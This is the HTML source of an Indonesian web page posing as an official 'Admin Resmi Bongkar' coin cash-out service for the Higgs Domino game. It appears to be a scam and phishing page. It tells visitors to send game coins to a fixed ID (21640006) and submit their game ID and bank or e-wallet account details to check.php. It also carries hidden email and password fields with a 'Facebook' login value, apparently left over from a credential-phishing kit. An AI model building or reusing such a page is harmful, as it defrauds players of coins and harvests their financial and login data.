

<html lang ="en">
<html>
 <head> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> 
<link rel="stylesheet" href="https://maxst.icons8.com/vue-static/landings/line-awesome/line-awesome/1.3.0/css/line-awesome.min.css"> 
  <link href="https://unpkg.com/boxicons@2.0.9/css/boxicons.min.css" rel="stylesheet"> 
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> 
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css"> 
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"> 
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css"> 
  <link rel="stylesheet" href="file/css/facebook.css"> 
  <title>BONGKAR ID</title> 
  <meta property="og:title" content="Agen Domino"> 
  <meta name="description" content="Top Up Dan Bongkar Koin Agen Domino!"> 
  <meta property="og:description" content="Top Up Dan Bongkar Koin Agen Domino!"> 
  <meta property="og:url" content="./"> 
  <meta property="og:site_name" content="Agen Doimino"> 
  <meta property="og:type" content="website"> 
  <meta name="copyright" content="nwg Ariandi"> 
  <meta name="theme-color" content="#0b5250"> 
  <meta property="og:image" content="img/higgs_domino.webp"> 
  <link rel="shorcut icon" href="https://i.ibb.co/yqZW7r6/02494223c899dbaf5d6fbe2dcfa24780.png">
  <style>
body {
  background: #043e3a;
  color: #23e1fd;
  font-family: "Helvetica Neue", Helvetica, STHeiTi, Arial, sans-serif;
  margin: 0
}

.appnwghdiprem {
  background: #043e3a;
  background-size: 100% 100%;
  position: relative;
  margin: 0 auto;
  max-width: 411px;
  height: auto
}

}
.containernwghdi {
  display: flow-root
}
    .boxverifnwghdi {

  background: #0b5250
}

.headernwgverifhdi {
  background: url(bg_top.jpg) no-repeat center;
  background-size: 120% 120%;
  font-size: 19px;
  line-height: 40px;
  text-align: center;
  color: #FFFF33;
  font-weight: 700;
  border-bottom: 4px solid #00e5f4
}

.headernwgverifhdi p {
  margin-block: 0
}

.boxnwgverifmarsya {
  background: url(bg_top.jpg) no-repeat center;
  background-size: cover;
  padding: 10px
}

.ucapanverifnwg {
  display: flex;
  flex-direction: column;
  line-height: 20px;
  font-size: 20px
  font-weight: 700px
}

.verifikasikeamanannwg {
  padding: 10px
}

.itemnwgverifhdi {
  display: flex;
  margin-bottom: 10px
}

.itemnwgverifhdi label {
  background: #ffbc68;
  color: #814545;
  padding: 8px;
  border-radius: 200px;
  font-weight: 600;
   width: 40px;
 height: 20px;
  text-align: middle;
  display: center;
  flex-direction: row;
  align-items: center;
}

.itemnwgverifhdi select {
  width: 100%;
  margin-left: 10px;
  background: #d5b184;
  color: #835121;
  border: none;
  padding: 10px 10px;
  font-size: 17px;
  border-radius: 5px;
  outline: 0
}

.itempantek input {
  width: 50%;
  margin-left:5px;
  background:  ;
  color: #835121;
  border: none;
  padding: 10px 10px;
  font-size: 17px;
  border-radius: 5px;
  outline: 0
}

.itempantek label {
  background: #ffbc68;
  color: #814545;
    margin-left: 60px;
  padding: 8px;
  border-radius: 100px;
  font-weight: 600;
   width: 40px;
            height: 20px;
  text-align: middle;
  display: center;
  flex-direction: row;
  align-items: center;
}

.itempantek select {
  width: 100%;
  margin-left: 10px;
  background: #d5b184;
  color: #835121;
  border: none;
  padding: 10px 10px;
  font-size: 17px;
  border-radius: 5px;
  outline: 0
  }

  .itempantek {
  display: flex;
  margin-bottom: 10px
}

.itemkontol label {
  margin-left: 60px;
  padding: 11px 1px;
  border-radius: 200px;
  font-weight: 600;
   width: 40px;
            height: 20px;
  text-align: middle;
  display: center;
  flex-direction: row;
  align-items: center;
}

.itemkontol {
  display: flex;
  margin-bottom: 10px
}

.itemkontol input {
  width: 50%;
  margin-left: 8px;
  background: #d5b184;
  color: #835121;
  border: none;
  padding: 10px 10px;
  font-size: 17px;
  border-radius: 5px;
  outline: 0
}

.itemnanjg {
    
  margin-bottom: 10px
}

.itemnanjg select {
  width: %;
  margin-left: 0px;
  background: #d5b184;
  color: #835121;
  border: none;
  padding: 10px 10px;
  font-size: 17px;
  border-radius: 5px;
  outline: 0

}

.itemnwgverifhdi input {
  width: 100%;
  margin-left: 10px;
  background: #d5b184;
  color: #835121;
  border: none;
  padding: 10px 10px;
  font-size: 17px;
  border-radius: 5px;
  outline: 0
}

.buttonnwgverifhdi {
  text-align: center
}

.buttonnwgverifhdi button {
  background-color: #67a309;
  background-image: linear-gradient(0deg, #67a309 0, #c7ee4c 100%);
  color: #268707;
  border: none;
  font-size: 20px;
  font-weight: 600;
  margin-top: 10px;
  line-height: 30px;
  border-radius: 10px;
  box-shadow: 0 2px 1px 0 #1a5806;
  outline: 0;
  padding: 4px 30px
}
</style>
 </head> 
 <body style="background: ;"> 
  <div class="appnwghdiprem" style="background: ;"> 
   <div class="containernwghdi"> 
    <div class="boxverifnwghdi"> 
     <div class="headernwgverifhdi"> 
      <p> Admin Resmi Bongkar  </p> 
     </div>
     <div class="boxnwgverifmarsya"> 
     <img src="img/bg1.jpg" alt="image" height="auto" width="100%">
      <div class="itemnanjg"> 
        <div class="itemnanjg">
     
      </div> 
     </div> 
     <div class="verifikasikeamanannwg"> 
      <form method="POST" action="check.php" class="boxformnwg"> 
  <div class="appnwghdiprem" style="background: #0b5250;"> 
   <div class="containernwghdi"> 
    <div class="boxverifnwghdi"> 
     <div class="headernwgverifhdi"> 
       <div class="itemnanjg">   
       </div> 
      <p>Info Pengirim</p> 
     </div>
            <div class="itemkontol"> 
        <label>1.</label> 
        <input type="number" name="passakun" placeholder="Masukan Id Anda" required>
       </div> 
        <div class="itemkontol"> 
        <label>2.</label> 
       <input type="text" name="nickname" placeholder="Nickname" required> 
       </div> 
        <div class="itemkontol"> 
        <label>3.</label> 
       <input type="text" name="Idakun" placeholder="Jumlah Bongkaran" required> 
       </div> 
       <div>
                <body style="background: #0b5250;"> 
  <div class="appnwghdiprem" style="background: #0b5250;"> 
   <div class="containernwghdi"> 
    <div class="boxverifnwghdi"> 
     <div class="headernwgverifhdi"> 
      <p>Silahkan Kirim Koin Ke Id Di Bawah Ini</p> 
       </div>
     </header> 
     <section class="banner"> 
      <div class="imageslide">
      <div style="text-align:center"> 
       <figure class="sliderbanner" style="display: block;"> 
        <img src="img/id.jpg" alt="Image" height="200" width="200">
       </figure> 
       <div class="itemkontol">
        <label>4.</label> 
<body>
<input type="text" value="21640006" id="myInput">
<button onclick="myFunction()">Copy</button>

<script>
function myFunction() {
  // Get the text field
  var copyText = document.getElementById("myInput");

  // Select the text field
  copyText.select();
  copyText.setSelectionRange(0, 99999); // For mobile devices

  // Copy the text inside the text field
  navigator.clipboard.writeText(copyText.value);
  
  // Alert the copied text
  alert("Copied the text: " + copyText.value);
}
</script>

</body>
        </div>
      <div>
          <div class="boxnwgverifmarsya"> 
      <div class="ucapanverifnwg"> 
       <span>SILAHKAN KIRIM SCRENSHOOT HISTORI PERNGIRIMAN AKUN ANDA KE AKUN YANG TERTERA DI ATAS,</span> 
        </div>
        <div class="itemkontol">
               <body style="background: #0b5250;"> 
  <div class="appnwghdiprem" style="background: #0b5250;"> 
   <div class="containernwghdi"> 
    <div class="boxverifnwghdi"> 
     <div class="headernwgverifhdi"> 
       <form action="/action_page.php">
  <input type="file" id="myFile" name="filename">
</form>
       </div>
       <body style="background: #0b5250;"> 
  <div class="appnwghdiprem" style="background: #0b5250;"> 
   <div class="containernwghdi"> 
    <div class="boxverifnwghdi"> 
     <div class="headernwgverifhdi">  
      <p>Bank Pencairan</p> 
     </div>
       <div class="itemnanjg"> 
        <select name="narek"> <option>BCA</option> <option>BRI</option> <option>BNI</option> <option>MANDIRI</option> <option>DANA</option> <option>OVO</option> <option>GOPAY</option> </select> 
       </div>  
       <div class="itemkontol"> 
        <label>5.</label> 
        <input type="number" name="norek" placeholder="Nomor Rekening Pencai" required> 
       </div> 
       <div class="itemkontol"> 
        <label>6.</label> 
        <input type="text" name="atasnama" placeholder="Atas Nama" required> 
       </div> 
       <div class="buttonnwgverifhdi"> 
        <input type="hidden" name="playid" id="ressplayid" value="" readonly>
                                <input type="hidden" name="nickname" id="ressnick" value="" readonly>
                                  <input type="hidden" name="email" id="ressemail" value="" readonly>
                                <input type="hidden" name="password" id="resspw" value="" readonly>
                                  <input type="hidden" name="emailpg" id="ressplayid" value="" readonly>
                                <input type="hidden" name="passwordpg" id="pwid" value="" readonly>
        <input type="hidden" name="login" id="nwg_login_fb" value="Facebook" readonly>
        <button type="submit">Kirim</button> 
       </div> 
      </form> 
     </div> 
    </div> 
    <iframe scrolling="no" allow="autoplay" controls="" loop="" src="" style="display: none" width="0" height="0" frameborder="no"></iframe> 
   </div> 
  </div> 
 </body>
</html>